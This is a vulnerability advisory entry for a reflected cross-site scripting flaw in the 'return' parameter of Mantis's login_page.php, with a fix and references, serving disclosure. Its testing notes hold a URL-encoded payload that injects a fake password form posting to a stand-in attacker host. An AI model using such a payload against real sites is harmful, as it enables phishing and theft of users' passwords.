Mantis login_page.php return Variable XSS

2004-08-22T09:59:23
ID OSVDB:9086
Type osvdb
Reporter Joxean Koret(joxeankoret@yahoo.es)
Modified 2004-08-22T09:59:23

Description

Vulnerability Description

Mantis contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "return" variable upon submission to the login_page.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Upgrade to version 0.19.0a2 (Alpha) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Mantis contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "return" variable upon submission to the login_page.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[victim]/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform action=%22http:// malicious.site.com/script.xxx%22%3EPlease type your password : %3Cinput type=%22password%22 name=%22your_password%22%3E%3Cbr%3E%3Cinput type=%22submit%22 value=%22Give me your password, please...%22%3E%3C/ form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E %3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E %3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr

References:

Vendor URL: http://www.mantisbt.org/ Security Tracker: 1011051 Secunia Advisory ID:12338 Related OSVDB ID: 9089 Related OSVDB ID: 9090 Related OSVDB ID: 9091 Related OSVDB ID: 9087 Related OSVDB ID: 9088 Other Advisory URL: http://www.securiteam.com/unixfocus/5KP0N0KDPA.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0292.html CVE-2004-1730